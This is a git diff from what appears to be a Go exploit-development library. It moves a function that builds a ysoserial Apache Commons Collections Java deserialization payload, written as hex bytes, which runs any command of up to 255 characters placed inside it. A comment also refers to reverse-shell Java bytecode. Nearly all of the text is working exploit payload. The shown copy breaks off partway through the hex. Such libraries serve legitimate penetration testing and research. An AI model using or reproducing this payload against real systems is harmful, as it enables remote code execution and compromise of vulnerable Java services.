 	"strings"
-	"errors"
 
 	"github.com/vulncheck-oss/go-exploit/config"
 	"github.com/vulncheck-oss/go-exploit/random"
 	"github.com/vulncheck-oss/go-exploit/transform"
 )
 
-var (
-	errInvalidCommandLength = errors.New("invalid command length")
-)
-
-func ErrorInvalidCommandLength(msg string) error {
-	return fmt.Errorf("%w: %s", errInvalidCommandLength, msg)
-}
-
-// Created using ysoserial with CommonsCollections10
-// It was created by allocating 255 space characters for the command
-// We just use what amount of that space we need for the command and put
-// the remaining spaces back after we're finished.
-// This does however mean that the commandStr has a length limitation of 
-// the allocated space (255)
-func Commons11CommandBytecode(commandStr string) ([]byte, error) {
-	if len(commandStr) > 255 {
-		return []byte{}, ErrorInvalidCommandLength("command cannot be longer than 255 characters")
-	}
-
-	if len(commandStr) <= 0 {
-		return []byte{}, ErrorInvalidCommandLength("command must be greater than 0 characters")
-	}
-	
-	payloadBytes := "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61"+
-	"\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x53\x65"+
-	"\x74\xba\x44\x85\x95\x96\xb8\xb7\x34\x03\x00\x00"+
-	"\x78\x70\x77\x0c\x00\x00\x00\x02\x3f\x40\x00\x00"+
-	"\x00\x00\x00\x01\x73\x72\x00\x34\x6f\x72\x67\x2e"+
-	"\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f"+
-	"\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f"+
-	"\x6e\x73\x2e\x6b\x65\x79\x76\x61\x6c\x75\x65\x2e"+
-	"\x54\x69\x65\x64\x4d\x61\x70\x45\x6e\x74\x72\x79"+
-	"\x8a\xad\xd2\x9b\x39\xc1\x1f\xdb\x02\x00\x02\x4c"+
-	"\x00\x03\x6b\x65\x79\x74\x00\x12\x4c\x6a\x61\x76"+
-	"\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63"+
-	"\x74\x3b\x4c\x00\x03\x6d\x61\x70\x74\x00\x0f\x4c"+
-	"\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61"+
-	"\x70\x3b\x78\x70\x73\x72\x00\x3a\x63\x6f\x6d\x2e"+
-	"\x73\x75\x6e\x2e\x6f\x72\x67\x2e\x61\x70\x61\x63"+
-	"\x68\x65\x2e\x78\x61\x6c\x61\x6e\x2e\x69\x6e\x74"+
-	"\x65\x72\x6e\x61\x6c\x2e\x78\x73\x6c\x74\x63\x2e"+
-	"\x74\x72\x61\x78\x2e\x54\x65\x6d\x70\x6c\x61\x74"+
-	"\x65\x73\x49\x6d\x70\x6c\x09\x57\x4f\xc1\x6e\xac"+
-	"\xab\x33\x03\x00\x06\x49\x00\x0d\x5f\x69\x6e\x64"+
-	"\x65\x6e\x74\x4e\x75\x6d\x62\x65\x72\x49\x00\x0e"+
-	"\x5f\x74\x72\x61\x6e\x73\x6c\x65\x74\x49\x6e\x64"+
-	"\x65\x78\x5b\x00\x0a\x5f\x62\x79\x74\x65\x63\x6f"+
-	"\x64\x65\x73\x74\x00\x03\x5b\x5b\x42\x5b\x00\x06"+
-	"\x5f\x63\x6c\x61\x73\x73\x74\x00\x12\x5b\x4c\x6a"+
-	"\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61"+
-	"\x73\x73\x3b\x4c\x00\x05\x5f\x6e\x61\x6d\x65\x74"+
-	"\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67"+
-	"\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x11\x5f"+
-	"\x6f\x75\x74\x70\x75\x74\x50\x72\x6f\x70\x65\x72"+
-	"\x74\x69\x65\x73\x74\x00\x16\x4c\x6a\x61\x76\x61"+
-	"\x2f\x75\x74\x69\x6c\x2f\x50\x72\x6f\x70\x65\x72"+
-	"\x74\x69\x65\x73\x3b\x78\x70\x00\x00\x00\x00\xff"+
-	"\xff\xff\xff\x75\x72\x00\x03\x5b\x5b\x42\x4b\xfd"+
-	"\x19\x15\x67\x67\xdb\x37\x02\x00\x00\x78\x70\x00"+
-	"\x00\x00\x02\x75\x72\x00\x02\x5b\x42\xac\xf3\x17"+
-	"\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x00\x00"+
-	"\x07\x93\xca\xfe\xba\xbe\x00\x00\x00\x32\x00\x39"+
-	"\x0a\x00\x03\x00\x22\x07\x00\x37\x07\x00\x25\x07"+
-	"\x00\x26\x01\x00\x10\x73\x65\x72\x69\x61\x6c\x56"+
-	"\x65\x72\x73\x69\x6f\x6e\x55\x49\x44\x01\x00\x01"+
-	"\x4a\x01\x00\x0d\x43\x6f\x6e\x73\x74\x61\x6e\x74"+
-	"\x56\x61\x6c\x75\x65\x05\xad\x20\x93\xf3\x91\xdd"+
-	"\xef\x3e\x01\x00\x06\x3c\x69\x6e\x69\x74\x3e\x01"+
-	"\x00\x03\x28\x29\x56\x01\x00\x04\x43\x6f\x64\x65"+
-	"\x01\x00\x0f\x4c\x69\x6e\x65\x4e\x75\x6d\x62\x65"+
-	"\x72\x54\x61\x62\x6c\x65\x01\x00\x12\x4c\x6f\x63"+
-	"\x61\x6c\x56\x61\x72\x69\x61\x62\x6c\x65\x54\x61"+
-	"\x62\x6c\x65\x01\x00\x04\x74\x68\x69\x73\x01\x00"+
-	"\x13\x53\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65"+
-	"\x74\x50\x61\x79\x6c\x6f\x61\x64\x01\x00\x0c\x49"+
-	"\x6e\x6e\x65\x72\x43\x6c\x61\x73\x73\x65\x73\x01"+
-	"\x00\x35\x4c\x79\x73\x6f\x73\x65\x72\x69\x61\x6c"+
-	"\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74"+
-	"\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24\x53"+
-	"\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65\x74\x50"+
-	"\x61\x79\x6c\x6f\x61\x64\x3b\x01\x00\x09\x74\x72"+
-	"\x61\x6e\x73\x66\x6f\x72\x6d\x01\x00\x72\x28\x4c"+
-	"\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f"+
-	"\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e"+
-	"\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73"+
-	"\x6c\x74\x63\x2f\x44\x4f\x4d\x3b\x5b\x4c\x63\x6f"+
-	"\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70"+
-	"\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74"+
-	"\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c"+
-	"\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69"+
-	"\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65"+
-	"\x72\x3b\x29\x56\x01\x00\x08\x64\x6f\x63\x75\x6d"+
-	"\x65\x6e\x74\x01\x00\x2d\x4c\x63\x6f\x6d\x2f\x73"+
-	"\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68"+
-	"\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65"+
-	"\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x44"+
-	"\x4f\x4d\x3b\x01\x00\x08\x68\x61\x6e\x64\x6c\x65"+
-	"\x72\x73\x01\x00\x42\x5b\x4c\x63\x6f\x6d\x2f\x73"+
-	"\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68"+
-	"\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e"+
-	"\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65"+
-	"\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74"+
-	"\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x01"+
-	"\x00\x0a\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73"+
-	"\x07\x00\x27\x01\x00\xa6\x28\x4c\x63\x6f\x6d\x2f"+
-	"\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63"+
-	"\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74"+
-	"\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f"+
-	"\x44\x4f\x4d\x3b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e"+
-	"\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f"+
-	"\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c"+
-	"\x2f\x64\x74\x6d\x2f\x44\x54\x4d\x41\x78\x69\x73"+
-	"\x49\x74\x65\x72\x61\x74\x6f\x72\x3b\x4c\x63\x6f"+
-	"\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70"+
-	"\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74"+
-	"\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c"+
-	"\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69"+
-	"\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65"+
-	"\x72\x3b\x29\x56\x01\x00\x08\x69\x74\x65\x72\x61"+
-	"\x74\x6f\x72\x01\x00\x35\x4c\x63\x6f\x6d\x2f\x73"+
-	"\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68"+
-	"\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e"+
-	"\x61\x6c\x2f\x64\x74\x6d\x2f\x44\x54\x4d\x41\x78"+
-	"\x69\x73\x49\x74\x65\x72\x61\x74\x6f\x72\x3b\x01"+
-	"\x00\x07\x68\x61\x6e\x64\x6c\x65\x72\x01\x00\x41"+
-	"\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67"+
-	"\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f"+
-	"\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72"+
-	"\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69"+
-	"\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e"+
-	"\x64\x6c\x65\x72\x3b\x01\x00\x0a\x53\x6f\x75\x72"+
-	"\x63\x65\x46\x69\x6c\x65\x01\x00\x0c\x47\x61\x64"+
-	"\x67\x65\x74\x73\x2e\x6a\x61\x76\x61\x0c\x00\x0a"+
-	"\x00\x0b\x07\x00\x28\x01\x00\x33\x79\x73\x6f\x73"+
-	"\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61"+
-	"\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67"+
-	"\x65\x74\x73\x24\x53\x74\x75\x62\x54\x72\x61\x6e"+
-	"\x73\x6c\x65\x74\x50\x61\x79\x6c\x6f\x61\x64\x01"+
-	"\x00\x40\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72"+
-	"\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c"+
-	"\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f"+
-	"\x78\x73\x6c\x74\x63\x2f\x72\x75\x6e\x74\x69\x6d"+
-	"\x65\x2f\x41\x62\x73\x74\x72\x61\x63\x74\x54\x72"+
-	"\x61\x6e\x73\x6c\x65\x74\x01\x00\x14\x6a\x61\x76"+
-	"\x61\x2f\x69\x6f\x2f\x53\x65\x72\x69\x61\x6c\x69"+
-	"\x7a\x61\x62\x6c\x65\x01\x00\x39\x63\x6f\x6d\x2f"+
-	"\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63"+
-	"\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74"+
-	"\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f"+
-	"\x54\x72\x61\x6e\x73\x6c\x65\x74\x45\x78\x63\x65"+
-	"\x70\x74\x69\x6f\x6e\x01\x00\x1f\x79\x73\x6f\x73"+
-	"\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61"+
-	"\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67"+
-	"\x65\x74\x73\x01\x00\x08\x3c\x63\x6c\x69\x6e\x69"+
-	"\x74\x3e\x01\x00\x11\x6a\x61\x76\x61\x2f\x6c\x61"+
-	"\x6e\x67\x2f\x52\x75\x6e\x74\x69\x6d\x65\x07\x00"+
-	"\x2a\x01\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69"+
-	"\x6d\x65\x01\x00\x15\x28\x29\x4c\x6a\x61\x76\x61"+
-	"\x2f\x6c\x61\x6e\x67\x2f\x52\x75\x6e\x74\x69\x6d"+
-	"\x65\x3b\x0c\x00\x2c\x00\x2d\x0a\x00\x2b\x00\x2e"+
-
-	// 255 characters were allocated, we just put back the unused
-	// length as spaces
-	"\x01\x00\xff" + commandStr + strings.Repeat(" ", 0xff-len(commandStr)) + 
-
-	"\x08\x00\x30\x01\x00\x04"+
-	"\x65\x78\x65\x63\x01\x00\x27\x28\x4c\x6a\x61\x76"+
-	"\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e"+
-	"\x67\x3b\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e"+
-	"\x67\x2f\x50\x72\x6f\x63\x65\x73\x73\x3b\x0c\x00"+
-	"\x32\x00\x33\x0a\x00\x2b\x00\x34\x01\x00\x0d\x53"+
-	"\x74\x61\x63\x6b\x4d\x61\x70\x54\x61\x62\x6c\x65"+
-	"\x01\x00\x1d\x79\x73\x6f\x73\x65\x72\x69\x61\x6c"+
-	"\x2f\x50\x77\x6e\x65\x72\x37\x34\x30\x30\x32\x30"+
-	"\x33\x39\x32\x34\x35\x37\x39\x31\x01\x00\x1f\x4c"+
-	"\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x50\x77"+
-	"\x6e\x65\x72\x37\x34\x30\x30\x32\x30\x33\x39\x32"+
-	"\x34\x35\x37\x39\x31\x3b\x00\x21\x00\x02\x00\x03"+
-	"\x00\x01\x00\x04\x00\x01\x00\x1a\x00\x05\x00\x06"+
-	"\x00\x01\x00\x07\x00\x00\x00\x02\x00\x08\x00\x04"+
-	"\x00\x01\x00\x0a\x00\x0b\x00\x01\x00\x0c\x00\x00"+
-	"\x00\x2f\x00\x01\x00\x01\x00\x00\x00\x05\x2a\xb7"+
-	"\x00\x01\xb1\x00\x00\x00\x02\x00\x0d\x00\x00\x00"+
-	"\x06\x00\x01\x00\x00\x00\x2f\x00\x0e\x00\x00\x00"+
-	"\x0c\x00\x01\x00\x00\x00\x05\x00\x0f\x00\x38\x00"+
-	"\x00\x00\x01\x00\x13\x00\x14\x00\x02\x00\x0c\x00"+
-	"\x00\x00\x3f\x00\x00\x00\x03\x00\x00\x00\x01\xb1"+
-	"\x00\x00\x00\x02\x00\x0d\x00\x00\x00\x06\x00\x01"+
-	"\x00\x00\x00\x33\x00\x0e\x00\x00\x00\x20\x00\x03"+
-	"\x00\x00\x00\x01\x00\x0f\x00\x38\x00\x00\x00\x00"+
-	"\x00\x01\x00\x15\x00\x16\x00\x01\x00\x00\x00\x01"+
-	"\x00\x17\x00\x18\x00\x02\x00\x19\x00\x00\x00\x04"+
-	"\x00\x01\x00\x1a\x00\x01\x00\x13\x00\x1b\x00\x02"+
-	"\x00\x0c\x00\x00\x00\x49\x00\x00\x00\x04\x00\x00"+
-	"\x00\x01\xb1\x00\x00\x00\x02\x00\x0d\x00\x00\x00"+
-	"\x06\x00\x01\x00\x00\x00\x36\x00\x0e\x00\x00\x00"+
-	"\x2a\x00\x04\x00\x00\x00\x01\x00\x0f\x00\x38\x00"+
-	"\x00\x00\x00\x00\x01\x00\x15\x00\x16\x00\x01\x00"+
-	"\x00\x00\x01\x00\x1c\x00\x1d\x00\x02\x00\x00\x00"+
-	"\x01\x00\x1e\x00\x1f\x00\x03\x00\x19\x00\x00\x00"+
-	"\x04\x00\x01\x00\x1a\x00\x08\x00\x29\x00\x0b\x00"+
-	"\x01\x00\x0c\x00\x00\x00\x24\x00\x03\x00\x02\x00"+
-	"\x00\x00\x0f\xa7\x00\x03\x01\x4c\xb8\x00\x2f\x12"+
-	"\x31\xb6\x00\x35\x57\xb1\x00\x00\x00\x01\x00\x36"+
-	"\x00\x00\x00\x03\x00\x01\x03\x00\x02\x00\x20\x00"+
-	"\x00\x00\x02\x00\x21\x00\x11\x00\x00\x00\x0a\x00"+
-	"\x01\x00\x02\x00\x23\x00\x10\x00\x09\x75\x71\x00"+
-	"\x7e\x00\x0e\x00\x00\x01\xd4\xca\xfe\xba\xbe\x00"+
-	"\x00\x00\x32\x00\x1b\x0a\x00\x03\x00\x15\x07\x00"+
-	"\x17\x07\x00\x18\x07\x00\x19\x01\x00\x10\x73\x65"+
-	"\x72\x69\x61\x6c\x56\x65\x72\x73\x69\x6f\x6e\x55"+
-	"\x49\x44\x01\x00\x01\x4a\x01\x00\x0d\x43\x6f\x6e"+
-	"\x73\x74\x61\x6e\x74\x56\x61\x6c\x75\x65\x05\x71"+
-	"\xe6\x69\xee\x3c\x6d\x47\x18\x01\x00\x06\x3c\x69"+
-	"\x6e\x69\x74\x3e\x01\x00\x03\x28\x29\x56\x01\x00"+
-	"\x04\x43\x6f\x64\x65\x01\x00\x0f\x4c\x69\x6e\x65"+
-	"\x4e\x75\x6d\x62\x65\x72\x54\x61\x62\x6c\x65\x01"+
-	"\x00\x12\x4c\x6f\x63\x61\x6c\x56\x61\x72\x69\x61"+
-	"\x62\x6c\x65\x54\x61\x62\x6c\x65\x01\x00\x04\x74"+
-	"\x68\x69\x73\x01\x00\x03\x46\x6f\x6f\x01\x00\x0c"+
-	"\x49\x6e\x6e\x65\x72\x43\x6c\x61\x73\x73\x65\x73"+
-	"\x01\x00\x25\x4c\x79\x73\x6f\x73\x65\x72\x69\x61"+
-	"\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75"+
-	"\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24"+
-	"\x46\x6f\x6f\x3b\x01\x00\x0a\x53\x6f\x75\x72\x63"+
-	"\x65\x46\x69\x6c\x65\x01\x00\x0c\x47\x61\x64\x67"+
-	"\x65\x74\x73\x2e\x6a\x61\x76\x61\x0c\x00\x0a\x00"+
-	"\x0b\x07\x00\x1a\x01\x00\x23\x79\x73\x6f\x73\x65"+
-	"\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64"+
-	"\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65"+
-	"\x74\x73\x24\x46\x6f\x6f\x01\x00\x10\x6a\x61\x76"+
-	"\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63"+
-	"\x74\x01\x00\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f"+
-	"\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65"+
-	"\x01\x00\x1f\x79\x73\x6f\x73\x65\x72\x69\x61\x6c"+
-	"\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74"+
-	"\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x00\x21"+
-	"\x00\x02\x00\x03\x00\x01\x00\x04\x00\x01\x00\x1a"+
-	"\x00\x05\x00\x06\x00\x01\x00\x07\x00\x00\x00\x02"+
-	"\x00\x08\x00\x01\x00\x01\x00\x0a\x00\x0b\x00\x01"+
-	"\x00\x0c\x00\x00\x00\x2f\x00\x01\x00\x01\x00\x00"+
-	"\x00\x05\x2a\xb7\x00\x01\xb1\x00\x00\x00\x02\x00"+
-	"\x0d\x00\x00\x00\x06\x00\x01\x00\x00\x00\x3a\x00"+
-	"\x0e\x00\x00\x00\x0c\x00\x01\x00\x00\x00\x05\x00"+
-	"\x0f\x00\x12\x00\x00\x00\x02\x00\x13\x00\x00\x00"+
-	"\x02\x00\x14\x00\x11\x00\x00\x00\x0a\x00\x01\x00"+
-	"\x02\x00\x16\x00\x10\x00\x09\x70\x74\x00\x04\x50"+
-	"\x77\x6e\x72\x70\x77\x01\x00\x78\x73\x72\x00\x2a"+
-	"\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63"+
-	"\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65"+
-	"\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c"+
-	"\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79"+
-	"\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74"+
-	"\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61"+
-	"\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e"+
-	"\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e"+
-	"\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65"+
-	"\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e"+
-	"\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f"+
-	"\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f"+
-	"\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e"+
-	"\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73"+
-	"\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c"+
-	"\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67"+
-	"\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c"+
-	"\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c"+
-	"\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d"+
-	"\x65\x71\x00\x7e\x00\x09\x5b\x00\x0b\x69\x50\x61"+
-	"\x72\x61\x6d\x54\x79\x70\x65\x73\x71\x00\x7e\x00"+
-	"\x08\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76"+
-	"\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63"+
-	"\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00"+
-	"\x00\x78\x70\x00\x00\x00\x00\x74\x00\x0e\x6e\x65"+
-	"\x77\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72"+
-	"\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c"+
-	"\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16"+
-	"\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00"+
-	"\x00\x00\x00\x73\x72\x00\x11\x6a\x61\x76\x61\x2e"+
-	"\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70"+
-	"\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46"+
-	"\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72"+
-	"\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64"+
-	"\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08"+
-	"\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x78"
-
-	return []byte(payloadBytes), nil
-}
-
 // This is the Java bytecode for a reverse shell. You can find the source code here:
 //
 // https://gist.github.com/j-baines/38eb6d16eed64986a369f7f981f57508
diff --git a/java/javagadget.go b/java/javagadget.go
index 8260daa..ccb5796 100644
--- a/java/javagadget.go
+++ b/java/javagadget.go
@@ -1,12 +1,291 @@
 package java
 
 import (
+	"errors"
+	"fmt"
 	"strconv"
 	"strings"
 
 	"github.com/vulncheck-oss/go-exploit/transform"
 )
 
+var errInvalidCommandLength = errors.New("invalid command length")
+
+func ErrorInvalidCommandLength(msg string) error {
+	return fmt.Errorf("%w: %s", errInvalidCommandLength, msg)
+}
+
+// the allocated space (255).
+func Commons11CommandBytecode(commandStr string) ([]byte, error) {
+	if len(commandStr) > 255 || len(commandStr) < 1 {
+		return []byte{}, ErrorInvalidCommandLength("command must be between 1 and 255 characters")
+	}
+
+	payloadBytes := "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61" +
+		"\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x53\x65" +
+		"\x74\xba\x44\x85\x95\x96\xb8\xb7\x34\x03\x00\x00" +
+		"\x78\x70\x77\x0c\x00\x00\x00\x02\x3f\x40\x00\x00" +
+		"\x00\x00\x00\x01\x73\x72\x00\x34\x6f\x72\x67\x2e" +
+		"\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f" +
+		"\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f" +
+		"\x6e\x73\x2e\x6b\x65\x79\x76\x61\x6c\x75\x65\x2e" +
+		"\x54\x69\x65\x64\x4d\x61\x70\x45\x6e\x74\x72\x79" +
+		"\x8a\xad\xd2\x9b\x39\xc1\x1f\xdb\x02\x00\x02\x4c" +
+		"\x00\x03\x6b\x65\x79\x74\x00\x12\x4c\x6a\x61\x76" +
+		"\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63" +
+		"\x74\x3b\x4c\x00\x03\x6d\x61\x70\x74\x00\x0f\x4c" +
+		"\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61" +
+		"\x70\x3b\x78\x70\x73\x72\x00\x3a\x63\x6f\x6d\x2e" +
+		"\x73\x75\x6e\x2e\x6f\x72\x67\x2e\x61\x70\x61\x63" +
+		"\x68\x65\x2e\x78\x61\x6c\x61\x6e\x2e\x69\x6e\x74" +
+		"\x65\x72\x6e\x61\x6c\x2e\x78\x73\x6c\x74\x63\x2e" +
+		"\x74\x72\x61\x78\x2e\x54\x65\x6d\x70\x6c\x61\x74" +
+		"\x65\x73\x49\x6d\x70\x6c\x09\x57\x4f\xc1\x6e\xac" +
+		"\xab\x33\x03\x00\x06\x49\x00\x0d\x5f\x69\x6e\x64" +
+		"\x65\x6e\x74\x4e\x75\x6d\x62\x65\x72\x49\x00\x0e" +
+		"\x5f\x74\x72\x61\x6e\x73\x6c\x65\x74\x49\x6e\x64" +
+		"\x65\x78\x5b\x00\x0a\x5f\x62\x79\x74\x65\x63\x6f" +
+		"\x64\x65\x73\x74\x00\x03\x5b\x5b\x42\x5b\x00\x06" +
+		"\x5f\x63\x6c\x61\x73\x73\x74\x00\x12\x5b\x4c\x6a" +
+		"\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61" +
+		"\x73\x73\x3b\x4c\x00\x05\x5f\x6e\x61\x6d\x65\x74" +
+		"\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" +
+		"\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x11\x5f" +
+		"\x6f\x75\x74\x70\x75\x74\x50\x72\x6f\x70\x65\x72" +
+		"\x74\x69\x65\x73\x74\x00\x16\x4c\x6a\x61\x76\x61" +
+		"\x2f\x75\x74\x69\x6c\x2f\x50\x72\x6f\x70\x65\x72" +
+		"\x74\x69\x65\x73\x3b\x78\x70\x00\x00\x00\x00\xff" +
+		"\xff\xff\xff\x75\x72\x00\x03\x5b\x5b\x42\x4b\xfd" +
+		"\x19\x15\x67\x67\xdb\x37\x02\x00\x00\x78\x70\x00" +
+		"\x00\x00\x02\x75\x72\x00\x02\x5b\x42\xac\xf3\x17" +
+		"\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x00\x00" +
+		"\x07\x93\xca\xfe\xba\xbe\x00\x00\x00\x32\x00\x39" +
+		"\x0a\x00\x03\x00\x22\x07\x00\x37\x07\x00\x25\x07" +
+		"\x00\x26\x01\x00\x10\x73\x65\x72\x69\x61\x6c\x56" +
+		"\x65\x72\x73\x69\x6f\x6e\x55\x49\x44\x01\x00\x01" +
+		"\x4a\x01\x00\x0d\x43\x6f\x6e\x73\x74\x61\x6e\x74" +
+		"\x56\x61\x6c\x75\x65\x05\xad\x20\x93\xf3\x91\xdd" +
+		"\xef\x3e\x01\x00\x06\x3c\x69\x6e\x69\x74\x3e\x01" +
+		"\x00\x03\x28\x29\x56\x01\x00\x04\x43\x6f\x64\x65" +
+		"\x01\x00\x0f\x4c\x69\x6e\x65\x4e\x75\x6d\x62\x65" +
+		"\x72\x54\x61\x62\x6c\x65\x01\x00\x12\x4c\x6f\x63" +
+		"\x61\x6c\x56\x61\x72\x69\x61\x62\x6c\x65\x54\x61" +
+		"\x62\x6c\x65\x01\x00\x04\x74\x68\x69\x73\x01\x00" +
+		"\x13\x53\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65" +
+		"\x74\x50\x61\x79\x6c\x6f\x61\x64\x01\x00\x0c\x49" +
+		"\x6e\x6e\x65\x72\x43\x6c\x61\x73\x73\x65\x73\x01" +
